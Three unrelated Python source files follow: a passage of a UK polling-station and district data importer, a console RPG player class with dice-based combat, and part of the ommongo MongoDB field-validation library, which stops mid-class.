        elif district_ids_from_stations:
            self.write_info("Stations have district ids attached")
            for district_id in get_missing(district_ids_from_stations, district_ids):
                self.logger.log_message(
                    logging.WARNING,
                    "District id: %s attached to a station but not found in districts",
                    variable=district_id,
                )
            for district_id in get_missing(district_ids, district_ids_from_stations):
                self.logger.log_message(
                    logging.WARNING,
                    "District id: %s found in districts but not attached to any station",
                    variable=district_id,
                )
            return False
        # NOTE(review): if neither side carries ids, this property implicitly
        # returns None (falsy) -- confirm that is the intended signal for
        # update_uprn_to_council_model().

    def import_data(self):
        """Run the full stations+districts import and persist the results."""
        # Optional step for pre import tasks
        try:
            self.pre_import()
        except NotImplementedError:
            pass
        self.stations = StationSet()
        self.districts = DistrictSet()
        self.import_polling_districts()
        self.import_polling_stations()
        self.districts.save()
        self.stations.save()
        self.districts.update_uprn_to_council_model(self.districts_have_station_ids)
class BaseStationsAddressesImporter(BaseStationsImporter, BaseAddressesImporter):
    """Importer that loads both polling stations and residential addresses."""

    def pre_import(self):
        # Optional hook; import_data() deliberately swallows NotImplementedError.
        raise NotImplementedError

    def import_data(self):
        """Run the full stations+addresses import and persist the results."""
        # Optional step for pre import tasks
        try:
            self.pre_import()
        except NotImplementedError:
            pass
        self.stations = StationSet()
        self.addresses = AddressList(self.logger)
        self.import_residential_addresses()
        self.import_polling_stations()
        self.addresses.check_records()
        self.addresses.update_uprn_to_council_model()
        self.stations.save()
class BaseCsvStationsShpDistrictsImporter(
    BaseStationsDistrictsImporter, CsvMixin, ShpMixin
):
    """
    Stations in CSV format
    Districts in SHP format
    """

    # Input formats consumed by the base importer machinery.
    stations_filetype = "csv"
    districts_filetype = "shp"
class BaseShpStationsShpDistrictsImporter(BaseStationsDistrictsImporter, ShpMixin):
    """
    Stations in SHP format
    Districts in SHP format
    """

    # Input formats consumed by the base importer machinery.
    stations_filetype = "shp"
    districts_filetype = "shp"
class BaseCsvStationsJsonDistrictsImporter(BaseStationsDistrictsImporter, CsvMixin):
    """
    Stations in CSV format
    Districts in GeoJSON format
    """

    # Input formats consumed by the base importer machinery.
    stations_filetype = "csv"
    districts_filetype = "geojson"
class BaseCsvStationsKmlDistrictsImporter(BaseStationsDistrictsImporter, CsvMixin):
    """
    Stations in CSV format
    Districts in KML format
    """

    # KML coordinates are WGS84 lon/lat.
    districts_srid = 4326
    stations_filetype = "csv"
    districts_filetype = "kml"

    # this is mainly here for legacy compatibility
    # mostly we should override this
    def district_record_to_dict(self, record):
        # Flatten 3D KML geometry to 2D GeoJSON before building the polygon.
        geojson = self.strip_z_values(record.geom.geojson)
        poly = self.clean_poly(GEOSGeometry(geojson, srid=self.get_srid("districts")))
        return {
            "internal_council_id": record["Name"].value,
            "name": record["Name"].value,
            "area": poly,
        }
class BaseScotlandSpatialHubImporter(
    BaseShpStationsShpDistrictsImporter, metaclass=abc.ABCMeta
):
    """
    Data from the Scotland SpatialHub will be provided in a single
    dataset for the whole country. All importers consuming this data
    should extend BaseScotlandSpatialHubImporter.
    """

    # British National Grid.
    srid = 27700
    districts_name = "parl.2019-12-12/Version 2/Polling-Districts/pub_poldi.shp"
    stations_name = "parl.2019-12-12/Version 2/Polling-Places/pub_polpl.shp"
    data_prefix = "Scotland-Dec 2019"
    shp_encoding = "latin-1"

    @property
    @abc.abstractmethod
    def council_name(self):
        # Council name used to filter the nationwide dataset to one council.
        pass

    @property
    def data_path(self):
        """Local path of the dataset; fetched from S3 unless
        settings.PRIVATE_DATA_PATH is configured."""
        if getattr(settings, "PRIVATE_DATA_PATH", None):
            path = settings.PRIVATE_DATA_PATH
        else:
            s3 = S3Wrapper()
            s3.fetch_data(self.data_prefix)
            path = s3.data_path
        return os.path.abspath(path)

    def get_base_folder_path(self):
        # Resolve the dataset folder by glob when working from local files
        # and no explicit base_folder_path was supplied.
        if getattr(self, "local_files", True):
            if self.base_folder_path is None:
                path = os.path.join(self.data_path, self.data_prefix + "*")
                return glob.glob(path)[0]
        return self.base_folder_path

    def parse_string(self, text):
        # Shapefile strings may carry trailing NUL padding; strip it.
        return text.strip().strip("\x00")

    def district_record_to_dict(self, record):
        # Skip records belonging to other councils.
        council_name = self.parse_string(record[2])
        if council_name != self.council_name:
            return None
        code = self.parse_string(record[0])
        if not code:
            return None
        name = self.parse_string(record[1])
        if not name:
            name = code
        return {"internal_council_id": code, "name": name, "polling_station_id": code}

    def station_record_to_dict(self, record):
        # Skip records belonging to other councils.
        council_name = self.parse_string(record[2])
        if council_name != self.council_name:
            return None
        code = self.parse_string(record[0])
        if not code:
            return None
        address = self.parse_string(record[3])
        return {"internal_council_id": code, "postcode": "", "address": address}
class BaseCsvStationsCsvAddressesImporter(BaseStationsAddressesImporter, CsvMixin):
    """
    Stations in CSV format
    Addresses in CSV format
    """

    # Input formats consumed by the base importer machinery.
    stations_filetype = "csv"
    addresses_filetype = "csv"
class BaseShpStationsCsvAddressesImporter(
    BaseStationsAddressesImporter, CsvMixin, ShpMixin
):
    """
    Stations in SHP format
    Addresses in CSV format
    """

    # Input formats consumed by the base importer machinery.
    stations_filetype = "shp"
    addresses_filetype = "csv"
class BaseGenericApiImporter(BaseStationsDistrictsImporter):
    """Importer whose districts/stations are downloaded from remote URLs."""

    srid = 4326
    districts_srid = 4326
    districts_name = None
    districts_url = None
    stations_name = None
    stations_url = None
    # Data is downloaded, not read from the local data tree.
    local_files = False

    def import_data(self):
        """Download, import and persist whichever datasets have URLs set."""
        # Optional step for pre import tasks
        try:
            self.pre_import()
        except NotImplementedError:
            pass
        self.districts = DistrictSet()
        self.stations = StationSet()
        # deal with 'stations only' or 'districts only' data
        if self.districts_url is not None:
            self.import_polling_districts()
        if self.stations_url is not None:
            self.import_polling_stations()
        self.districts.save()
        self.stations.save()
        self.districts.update_uprn_to_council_model(self.districts_have_station_ids)

    def get_districts(self):
        # Download to a temp file so the standard file parsers can be reused.
        with tempfile.NamedTemporaryFile() as tmp:
            urllib.request.urlretrieve(self.districts_url, tmp.name)
            return self.get_data(self.districts_filetype, tmp.name)

    def get_stations(self):
        # Download to a temp file so the standard file parsers can be reused.
        with tempfile.NamedTemporaryFile() as tmp:
            urllib.request.urlretrieve(self.stations_url, tmp.name)
            return self.get_data(self.stations_filetype, tmp.name)
class BaseApiKmlStationsKmlDistrictsImporter(BaseGenericApiImporter):
    """
    Stations in KML format
    Districts in KML format
    """

    # Input formats consumed by the base importer machinery.
    stations_filetype = "kml"
    districts_filetype = "kml"
class BaseApiShpZipStationsShpZipDistrictsImporter(BaseGenericApiImporter, ShpMixin):
    """
    Stations in Zipped SHP format
    Districts in Zipped SHP format
    """

    # Input formats consumed by the base importer machinery.
    stations_filetype = "shp.zip"
    districts_filetype = "shp.zip"
class BaseApiCsvStationsShpZipDistrictsImporter(
    BaseGenericApiImporter, CsvMixin, ShpMixin
):
    """
    Stations in CSV format
    Districts in Zipped SHP format
    """

    # Input formats consumed by the base importer machinery.
    stations_filetype = "csv"
    districts_filetype = "shp.zip"
| |
import random
from Boss import Boss
from Character import Character
from Enemy import Enemy
from Messages import Messages
class Player(Character):
    """A user-controlled combatant; turns are driven by console input.

    A ``battlefield`` is a two-slot sequence: ``battlefield[0]`` is the list
    of allies and ``battlefield[1]`` is either a list of enemies or a single
    Boss instance.
    """

    # Attack rolls against the player must beat this value.
    Armor = 12
    BaseSpeed = 12
    # Key into Messages.ui_texts for the action menu shown by display().
    ActionSet = "DEFAULT_ACTIONS"
    BaseHealPower = 3

    def __init__(self, name, extra_life_points):
        super().__init__(name, extra_life_points)
        self._blocking = False
        self._kill_counter = 0
        # Menu choice -> bound action callable; subclasses may extend this.
        self._actions = {
            "1": self.attack,
            "2": self.block
        }

    def __lt__(self, entity):
        # Ordering: players rank above enemies, below bosses, and among
        # themselves compare by name (descending, via ``>``).
        if isinstance(entity, Enemy):
            return False
        elif isinstance(entity, Boss):
            return True
        else:
            return self.get_name > entity.get_name

    # Candidate to deprecate
    @property
    def is_blocking(self):
        return self._blocking

    # Candidate to deprecate
    def block(self, battlefield=None):
        # Toggle blocking. When a battlefield is given, remove and re-append
        # self on the allies list (moves self to the end of the list).
        if battlefield is None:
            self._blocking = not self._blocking
        else:
            battlefield[0].remove(self)
            self._blocking = not self._blocking
            battlefield[0].append(self)
        return battlefield

    @property
    def get_kill_counter(self):
        return self._kill_counter

    def set_kill_counter(self, kill_counter):
        self._kill_counter = kill_counter

    @property
    def get_actions(self):
        return self._actions

    def roll_initiative(self):
        # Add a d20 to the battle speed; input() just paces the console UI.
        input(Messages.ui_texts['ROLL_INITIATIVE'])
        dice = random.randint(1, 20)
        print(Messages.ui_texts['ROLLED'] + str(dice))
        self.set_battle_speed(self.get_battle_speed + dice)

    def play_turn(self, battlefield):
        """Prompt for a valid action, execute it, and return the battlefield."""
        # Blocking lasts one turn: clear it before acting again.
        if self.is_blocking:
            self.block()
        self.display()
        action = self.get_actions.get(input(Messages.ui_texts['WHAT_WILL_YOU_DO']))
        while not action:
            print(Messages.ui_texts['THINK_CLEARLY'])
            self.display()
            action = self.get_actions.get(input(Messages.ui_texts['WHAT_WILL_YOU_DO']))
        else:
            # while/else: the loop has no break, so this runs exactly once a
            # valid action has been chosen.
            battlefield = action(battlefield)
        return battlefield

    def display(self):
        # Show whose turn it is, current HP, and the action menu.
        print(self.get_name + '\'' + Messages.ui_texts['TURNS'])
        print(Messages.ui_texts['LIFE_POINTS'].format(self.get_life_points))
        for action in Messages.ui_texts[self.ActionSet]:
            print(action)

    # TODO Add specific messages depending on skill_name
    # Check aoe method for guidance about the structure of the messages
    def attack(self, battlefield, dmg=Character.BaseDmg, skill_name='BASIC_ATK', crit_augmented=False):
        """Single-target attack: d20 roll vs enemy Armor; 20 (or
        crit_augmented) deals 1.5x damage."""
        if isinstance(battlefield[1], Boss):
            enemy = battlefield[1]
        else:
            enemy = Player.choose_target(battlefield[1])
            battlefield[1].remove(enemy)
        # Skill start message
        print(Messages.ui_texts[skill_name][0].format(self.get_name))
        if crit_augmented:
            # crit_augmented forces a natural 20.
            dice = 20
            # Crit Augmented message
            print(Messages.ui_texts['PLACEHOLDER'])
        else:
            input(Messages.ui_texts['ROLL_ATTACK'])
            dice = random.randint(1, 20)
            print(Messages.ui_texts['ROLLED'] + str(dice))
        if dice == 20 or dice > enemy.Armor:
            print(Messages.ui_texts[skill_name][1].format(self.get_name, enemy.get_name))  # normal hit
            if dice == 20 or crit_augmented:
                print(Messages.ui_texts[skill_name][2].format(self.get_name, enemy.get_name))  # critical hit
                enemy.set_life_points(int(-1.5 * dmg))
            else:
                enemy.set_life_points(-1 * dmg)
            if enemy.is_alive:
                # Put the survivor back on the battlefield.
                if isinstance(enemy, Boss):
                    battlefield[1] = enemy
                else:
                    battlefield[1].append(enemy)
            else:
                print(Messages.ui_texts['YOU_KILLED'])
                self.set_kill_counter(self.get_kill_counter + 1)
        else:
            # Missed: restore the enemy untouched.
            if isinstance(enemy, Boss):
                battlefield[1] = enemy
            else:
                battlefield[1].append(enemy)
            print(Messages.ui_texts[skill_name][3].format(self.get_name, enemy.get_name))  # missed
        return battlefield

    # TODO Add specific messages depending on skill_name
    def aoe(self, battlefield, dmg=Character.BaseDmg, skill_name="AOE"):
        """Area attack: one d20 roll applies the same damage to every enemy."""
        # Skill start message
        print(Messages.ui_texts[skill_name][0].format(self.get_name))
        input(Messages.ui_texts['ROLL_ATTACK'])
        dice = random.randint(1, 20)
        print(Messages.ui_texts['ROLLED'] + str(dice))
        if dice == 20:
            # Critical hit Message
            print(Messages.ui_texts[skill_name][2].format(self.get_name))
            multiplier = -1.5
        elif dice >= 10:
            # Normal hit message
            print(Messages.ui_texts[skill_name][1].format(self.get_name))
            multiplier = -1
        else:
            # Miss Message
            print(Messages.ui_texts[skill_name][3].format(self.get_name))
            return battlefield
        if isinstance(battlefield[1], Boss):
            battlefield[1].set_life_points(multiplier * dmg)
            return battlefield
        # Keep only the enemies that survive the hit.
        enemies_after_skill = []
        for enemy in battlefield[1]:
            enemy.set_life_points(multiplier * dmg)
            if enemy.is_alive:
                enemies_after_skill.append(enemy)
            else:
                self.set_kill_counter(self.get_kill_counter + 1)
        battlefield[1] = enemies_after_skill
        return battlefield

    # TODO Review messages of apply_status flow
    def apply_status(self, battlefield, turns, status, dmg=7, skill_name="STATUS", crit_augmented=False):
        """Apply a POISON or FREEZE status to one enemy (d20, success on 12+)."""
        if isinstance(battlefield[1], Boss):
            enemy = battlefield[1]
        else:
            enemy = Player.choose_target(battlefield[1])
            battlefield[1].remove(enemy)
        # Skill start message
        print(Messages.ui_texts[skill_name][0].format(self.get_name))
        if crit_augmented:
            # crit_augmented forces a natural 20.
            dice = 20
            # Crit Augmented message
            print(Messages.ui_texts['PLACEHOLDER'])
        else:
            input(Messages.ui_texts['ROLL_ATTACK'])
            dice = random.randint(1, 20)
            print(Messages.ui_texts['ROLLED'] + str(dice))
        if status == "POISON":
            if dice == 20 or crit_augmented:
                enemy.poison(turns + 1, dmg + 1, self)
            elif dice >= 12:
                enemy.poison(turns, dmg, self)
            else:
                # Miss message
                print(Messages.ui_texts[skill_name][1].format(self.get_name))
        elif status == "FREEZE":
            if dice == 20:
                enemy.freeze(turns + 2)
                enemy.set_life_points(-1.5 * dmg)
            elif dice >= 12:
                enemy.freeze(turns)
                enemy.set_life_points(-1 * dmg)
            else:
                # Fail!
                print(Messages.ui_texts[skill_name][1].format(self.get_name))
        if enemy.is_alive:
            # Put the survivor back on the battlefield.
            if isinstance(enemy, Boss):
                battlefield[1] = enemy
            else:
                battlefield[1].append(enemy)
        else:
            print(Messages.ui_texts['PLACEHOLDER'])
            self.set_kill_counter(self.get_kill_counter + 1)
        return battlefield

    def heal(self, battlefield, skill_name="HEAL", resurrect=False, bonus_healing=0):
        """Heal one ally (d20: 20 = 1.5x heal, 10+ = normal, else nothing)."""
        # Spell start message
        print(Messages.ui_texts[skill_name][0].format(self.get_name))
        target = Player.choose_target(battlefield[0])
        input(Messages.ui_texts['ROLL_HEAL'])
        dice = random.randint(1, 20)
        if dice == 20:
            if resurrect:
                target.revive()
            target.set_life_points(1.5 * (self.BaseHealPower + bonus_healing))
        elif dice >= 10:
            if resurrect:
                target.revive()
            target.set_life_points(self.BaseHealPower + bonus_healing)
        return battlefield

    # TODO Add healing counter here
    def party_healing(self, battlefield, skill_name='PARTY_HEAL', bonus_healing=0):
        """Heal every ally for half the heal power (d20: 20 crits, 10+ hits)."""
        # Spell start message
        print(Messages.ui_texts[skill_name][0].format(self.get_name))
        input(Messages.ui_texts['ROLL_HEAL'])
        dice = random.randint(1, 20)
        if dice == 20:
            # Crit success
            print(Messages.ui_texts[skill_name][1].format(self.get_name))
            for friend in battlefield[0]:
                friend.set_life_points(1.5 * ((self.BaseHealPower + bonus_healing) / 2))
            # TODO Add healing counter here
        elif dice >= 10:
            # Success
            print(Messages.ui_texts[skill_name][2].format(self.get_name))
            for friend in battlefield[0]:
                friend.set_life_points((self.BaseHealPower + bonus_healing) / 2)
            # TODO Add healing counter here
        else:
            # Fail
            print(Messages.ui_texts[skill_name][3].format(self.get_name))
        return battlefield

    # TODO Change 'ENEMY_HAS_LIFE_POINTS' for just 'X_HAS_LIFE_POINTS'
    # TODO Modify 'X_HAS_LIFE_POINTS' to show max health too
    @staticmethod
    def choose_target(targets):
        """List targets 1..N and loop until the user picks a valid index."""
        i = 1
        for enemy in targets:
            print(Messages.ui_texts["X_HAS_LIFE_POINTS"].format(i, enemy.get_name, enemy.get_life_points))
            i += 1
        t = 0
        while True:
            try:
                t = int(input(Messages.ui_texts['WHATS_YOUR_TARGET']))
            except ValueError:
                print(Messages.ui_texts['THAT_IS_NOT_EVEN'])
                t = 0
                continue
            if 0 < t < i:
                break
            print(Messages.ui_texts['THAT_IS_NOT_VALID'])
        return targets[int(t) - 1]
| |
# The MIT License
#
# Copyright (c) 2010 Jeffrey Jenkins
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
from ommongo.py3compat import *
from ommongo.fields.base import *
class PrimitiveField(Field):
    ''' Primitive fields are fields where a single constructor can be used
        for wrapping and unwrapping an object.'''

    valid_modifiers = SCALAR_MODIFIERS

    def __init__(self, constructor, **kwargs):
        ''' :param constructor: callable applied to values on both wrap and unwrap
            :param kwargs: arguments for :class:`Field`
        '''
        super(PrimitiveField, self).__init__(**kwargs)
        self.constructor = constructor

    def wrap(self, value):
        ''' Validate ``value`` and convert it for storage. '''
        self.validate_wrap(value)
        return self.constructor(value)

    def unwrap(self, value, session=None):
        ''' Validate ``value`` and convert it back for object use. '''
        self.validate_unwrap(value)
        return self.constructor(value)
class StringField(PrimitiveField):
    ''' Unicode Strings. ``unicode`` is used to wrap and unwrap values,
        and any subclass of basestring is an acceptable input'''

    def __init__(self, max_length=None, min_length=None, **kwargs):
        ''' :param max_length: maximum string length
            :param min_length: minimum string length
            :param kwargs: arguments for :class:`Field`
        '''
        self.max = max_length
        self.min = min_length
        # ``unicode`` comes from ommongo.py3compat (str on Python 3).
        super(StringField, self).__init__(constructor=unicode, **kwargs)

    def validate_wrap(self, value):
        ''' Validates the type and length of ``value`` '''
        if not isinstance(value, basestring):
            self._fail_validation_type(value, basestring)
        if self.max is not None and len(value) > self.max:
            self._fail_validation(value, 'Value too long (%d)' % len(value))
        if self.min is not None and len(value) < self.min:
            self._fail_validation(value, 'Value too short (%d)' % len(value))
class RegExStringField(PrimitiveField):
    ''' Unicode Strings. ``unicode`` is used to wrap and unwrap values,
        and any subclass of basestring is an acceptable input, as long as
        it matches the provided regex.'''

    def __init__(self, regex, **kwargs):
        ''' :param regex: instance of :class: `RegexObject` to match against
            :param kwargs: arguments for :class:`Field`
        '''
        self.regex = regex
        super(RegExStringField, self).__init__(constructor=unicode, **kwargs)

    def validate_wrap(self, value):
        ''' Validates the type of ``value`` and that it matches the regex. '''
        if not isinstance(value, basestring):
            self._fail_validation_type(value, basestring)
        # match() only anchors at the start; the pattern itself must end with
        # ``$`` if a full match is required.
        if self.regex.match(value) is None:
            self._fail_validation(value, 'Value does not match regular expression')
class BinaryField(PrimitiveField):
    ''' Binary data. Accepts ``bytes`` or :class:`~bson.Binary` input and
        stores values wrapped in :class:`~bson.Binary`. '''

    def __init__(self, **kwargs):
        ''' :param kwargs: arguments for :class:`Field` '''
        super(BinaryField, self).__init__(constructor=Binary, **kwargs)

    def validate_wrap(self, value):
        ''' Validates that ``value`` is ``bytes`` or ``Binary``. '''
        if not isinstance(value, bytes) and not isinstance(value, Binary):
            # BUG FIX: the failure previously reported ``str`` as an accepted
            # type even though the check accepts ``bytes``/``Binary`` only
            # (on Python 3 ``str`` is NOT accepted).
            self._fail_validation_type(value, bytes, Binary)
class BoolField(PrimitiveField):
    ''' ``True`` or ``False``.'''

    def __init__(self, **kwargs):
        ''' :param kwargs: arguments for :class:`Field` '''
        super(BoolField, self).__init__(constructor=bool, **kwargs)

    def validate_wrap(self, value):
        ''' Validates that ``value`` is exactly a ``bool``. '''
        if not isinstance(value, bool):
            self._fail_validation_type(value, bool)
class NumberField(PrimitiveField):
    ''' Base class for numeric fields '''

    valid_modifiers = NUMBER_MODIFIERS

    def __init__(self, constructor, min_value=None, max_value=None, **kwargs):
        ''' :param constructor: numeric type used to wrap/unwrap values
            :param max_value: maximum value
            :param min_value: minimum value
            :param kwargs: arguments for :class:`Field`
        '''
        super(NumberField, self).__init__(constructor=constructor, **kwargs)
        self.min = min_value
        self.max = max_value

    def schema_json(self):
        super_schema = super(NumberField, self).schema_json()
        return dict(min_value=self.min,
                    max_value=self.max, **super_schema)

    def validate_wrap(self, value, *types):
        ''' Validates the type and value of ``value`` against ``types``
            and the configured min/max bounds. '''
        # for/else: the else branch fires only if no accepted type matched.
        for type in types:
            if isinstance(value, type):
                break
        else:
            self._fail_validation_type(value, *types)
        if self.min is not None and value < self.min:
            self._fail_validation(value, 'Value too small')
        if self.max is not None and value > self.max:
            self._fail_validation(value, 'Value too large')
class IntField(NumberField):
    ''' Subclass of :class:`~NumberField` for ``int``'''

    def __init__(self, **kwargs):
        ''' :param max_value: maximum value
            :param min_value: minimum value
            :param kwargs: arguments for :class:`Field`
        '''
        super(IntField, self).__init__(constructor=int, **kwargs)

    def validate_wrap(self, value):
        ''' Validates the type and value of ``value`` '''
        # ``long`` comes from ommongo.py3compat (aliased to int on Python 3).
        NumberField.validate_wrap(self, value, int, long)
class FloatField(NumberField):
    ''' Subclass of :class:`~NumberField` for ``float`` '''

    def __init__(self, **kwargs):
        ''' :param max_value: maximum value
            :param min_value: minimum value
            :param kwargs: arguments for :class:`Field`
        '''
        super(FloatField, self).__init__(constructor=float, **kwargs)

    def validate_wrap(self, value):
        ''' Validates the type and value of ``value`` (ints are accepted
            and coerced to float by the constructor). '''
        return NumberField.validate_wrap(self, value, float, int)
class DateTimeField(PrimitiveField):
    ''' Field for datetime objects. '''

    has_autoload = True

    def __init__(self, min_date=None, max_date=None, use_tz=False, **kwargs):
        ''' :param max_date: maximum date
            :param min_date: minimum date
            :param use_tz: Require a timezone-aware datetime (via pytz).
                Values are converted to UTC before saving. min and max dates
                are currently ignored when use_tz is on. You MUST pass a
                timezone into the session
            :param kwargs: arguments for :class:`Field`
        '''
        # Identity constructor: datetime values pass through unchanged.
        super(DateTimeField, self).__init__(lambda dt : dt, **kwargs)
        self.min = min_date
        self.max = max_date
        self.use_tz = use_tz
        if self.use_tz:
            import pytz
            self.utc = pytz.utc
            # min/max bounds are not supported in tz-aware mode.
            assert self.min is None and self.max is None

    def schema_json(self):
        super_schema = super(DateTimeField, self).schema_json()
        return dict(min_date=self.min,
                    max_date=self.max,
                    use_tz=self.use_tz, **super_schema)

    def wrap(self, value):
        ''' Validate ``value`` and return it for storage. '''
        self.validate_wrap(value)
        value = self.constructor(value)
        # NOTE(review): both branches return the value unchanged, so no UTC
        # conversion actually happens here despite the __init__ docstring --
        # confirm whether ``value.astimezone(self.utc)`` was intended.
        if self.use_tz:
            return value
        return value

    def unwrap(self, value, session=None):
        ''' Validate ``value`` and, when it is tz-aware, normalise its tzinfo
            and localize to the session timezone if one is available. '''
        self.validate_unwrap(value)
        value = self.constructor(value)
        if value.tzinfo is not None:
            import pytz
            # NOTE(review): replace() swaps the tzinfo object for pytz.utc
            # without converting -- presumably the driver returns UTC-aware
            # datetimes here; confirm.
            value = value.replace(tzinfo=pytz.utc)
            if session and session.timezone:
                value = value.astimezone(session.timezone)
        return value

    def localize(self, session, value):
        # Convert a value into the session timezone (tz-aware mode only);
        # presumably invoked via has_autoload -- confirm against the session.
        if value is None or not self.use_tz:
            return value
        return value.astimezone(session.timezone)

    def validate_wrap(self, value):
        ''' Validates the value's type as well as it being in the valid
            date range'''
        if not isinstance(value, datetime):
            self._fail_validation_type(value, datetime)
        if self.use_tz and value.tzinfo is None:
            self._fail_validation(value, '''datetime is not timezone aware and use_tz is on. make sure timezone is set on the session''')
        # if using timezone support it isn't clear how min and max should work,
        # so the problem is being punted on for now.
        if self.use_tz:
            return
        # min/max
        if self.min is not None and value < self.min:
            self._fail_validation(value, 'DateTime too old')
        if self.max is not None and value > self.max:
            self._fail_validation(value, 'DateTime too new')
class TupleField(Field):
    ''' Represents a field which is a tuple of a fixed size with specific
        types for each element in the field.

        **Examples** ``TupleField(IntField(), BoolField())`` would accept
        ``[19, False]`` as a value for both wrapping and unwrapping. '''

    # uses scalar modifiers since it is not variable length
    valid_modifiers = SCALAR_MODIFIERS

    def __init__(self, *item_types, **kwargs):
        ''' :param item_types: instances of :class:`Field`, in the order they \
                will appear in the tuples.
            :param kwargs: arguments for :class:`Field`
        '''
        super(TupleField, self).__init__(**kwargs)
        self.size = len(item_types)
        self.types = item_types

    def schema_json(self):
        super_schema = super(TupleField, self).schema_json()
        types = [t.schema_json() for t in self.types]
        return dict(types=types, **super_schema)

    def set_parent_on_subtypes(self, parent):
        for type in self.types:
            type._set_parent(parent)

    def validate_wrap(self, value):
        ''' Checks that the correct number of elements are in ``value`` and that
            each element validates agains the associated Field class
        '''
        # NOTE(review): despite the docstring, the element count is not
        # enforced -- izip stops at the shorter of the two sequences.
        # Confirm whether a length check against self.size should be added.
        if not isinstance(value, list) and not isinstance(value, tuple):
            self._fail_validation_type(value, tuple, list)
        for field, value in izip(self.types, list(value)):
            field.validate_wrap(value)

    def validate_unwrap(self, value):
        ''' Checks that the correct number of elements are in ``value`` and that
            each element validates agains the associated Field class
        '''
        # NOTE(review): as above, the element count is not actually enforced.
        if not isinstance(value, list) and not isinstance(value, tuple):
            self._fail_validation_type(value, tuple, list)
        for field, value in izip(self.types, value):
            field.validate_unwrap(value)

    def wrap(self, value):
        ''' Validate and then wrap ``value`` for insertion.

            :param value: the tuple (or list) to wrap
        '''
        self.validate_wrap(value)
        ret = []
        for field, value in izip(self.types, value):
            ret.append(field.wrap(value))
        return ret

    def unwrap(self, value, session=None):
        ''' Validate and then unwrap ``value`` for object creation.

            :param value: list returned from the database.
        '''
        self.validate_unwrap(value)
        ret = []
        for field, value in izip(self.types, value):
            ret.append(field.unwrap(value, session=session))
        return tuple(ret)
class GeoField(TupleField):
    ''' A (float, float) coordinate pair, stored as a two-element tuple. '''

    def __init__(self, **kwargs):
        ''' :param kwargs: arguments for :class:`Field`
        '''
        super(GeoField, self).__init__(FloatField(), FloatField(), **kwargs)

    def schema_json(self):
        super_schema = super(GeoField, self).schema_json()
        return dict(**super_schema)
class EnumField(Field):
    ''' Represents a single value out of a list of possible values, all
        of the same type. == is used for comparison

        **Example**: ``EnumField(IntField(), 4, 6, 7)`` would accept anything
        in ``(4, 6, 7)`` as a value. It would not accept ``5``.
    '''

    valid_modifiers = SCALAR_MODIFIERS

    def __init__(self, item_type, *values, **kwargs):
        ''' :param item_type: Instance of :class:`Field` to use for validation, and (un)wrapping
            :param values: Possible values. ``item_type.is_valid_wrap(value)`` should be ``True``
        '''
        super(EnumField, self).__init__(**kwargs)
        self.item_type = item_type
        self.values = values
        # Jan 22, 2011: Commenting this out. We already check that the value
        # is the right type, and that it is equal to one of the enum values.
        # If those are true, the enum values are the right type. If we do it
        # now it causes validation issues in some cases with the
        # string-reference document fields
        #
        # for value in values:
        #     self.item_type.validate_wrap(value)

    def schema_json(self):
        super_schema = super(EnumField, self).schema_json()
        return dict(item_type=self.item_type.schema_json(),
                    values=[self.item_type.wrap(v) for v in self.values],
                    **super_schema)

    def set_parent_on_subtypes(self, parent):
        self.item_type._set_parent(parent)

    def validate_wrap(self, value):
        ''' Checks that value is valid for `EnumField.item_type` and that
            value is one of the values specified when the EnumField was
            constructed '''
        self.item_type.validate_wrap(value)
        if value not in self.values:
            self._fail_validation(value, 'Value was not in the enum values')

    def validate_unwrap(self, value):
        ''' Checks that value is valid for `EnumField.item_type`.

            .. note ::
                Since checking the value itself is not possible until is is
                actually unwrapped, that check is done in :func:`EnumField.unwrap`'''
        self.item_type.validate_unwrap(value)

    def wrap(self, value):
        ''' Validate and wrap value using the wrapping function from
            ``EnumField.item_type``
        '''
        self.validate_wrap(value)
        return self.item_type.wrap(value)

    def unwrap(self, value, session=None):
        ''' Unwrap value using the unwrap function from ``EnumField.item_type``.
            Since unwrap validation could not happen in is_valid_wrap, it
            happens in this function.'''
        self.validate_unwrap(value)
        value = self.item_type.unwrap(value, session=session)
        # Return the canonical enum object (compared via ==), not the
        # freshly-unwrapped copy.
        for val in self.values:
            if val == value:
                return val
        self._fail_validation(value, 'Value was not in the enum values')
class AnythingField(Field):
    ''' A pass-through field: values are stored and retrieved without any
        validation or transformation.  Useful for free-form objects. '''

    valid_modifiers = ANY_MODIFIER

    def schema_json(self):
        return super(AnythingField, self).schema_json()

    def validate_wrap(self, value):
        ''' Any value is acceptable; never fails. '''
        pass

    def validate_unwrap(self, value):
        ''' Any value is acceptable; never fails. '''
        pass

    def wrap(self, value):
        ''' Return ``value`` untouched. '''
        return value

    def unwrap(self, value, session=None):
        ''' Return ``value`` untouched. '''
        return value
class ObjectIdField(Field):
    ''' pymongo Object ID object. Currently this is probably too strict. A
        string version of an ObjectId should also be acceptable'''
    valid_modifiers = SCALAR_MODIFIERS

    def __init__(self, session=None, auto=False, **kwargs):
        ''' :param auto: when ``True``, a freshly generated ``ObjectId`` is
                used as the field's default value. '''
        # BUG FIX: the flag was never stored, so schema_json() raised
        # AttributeError when it read ``self.auto``.
        self.auto = auto
        if auto:
            kwargs['default_f'] = lambda : ObjectId()
        super(ObjectIdField, self).__init__(**kwargs)

    def schema_json(self):
        super_schema = super(ObjectIdField, self).schema_json()
        # BUG FIX: key was misspelled 'auth'; it reports the ``auto`` flag.
        return dict(auto=self.auto, **super_schema)

    def gen(self):
        """ Helper method to create a new ObjectId """
        return ObjectId()

    def validate_wrap(self, value):
        ''' Checks that ``value`` is a pymongo ``ObjectId`` or a string
            representation of one (12 raw bytes or 24 hex characters). '''
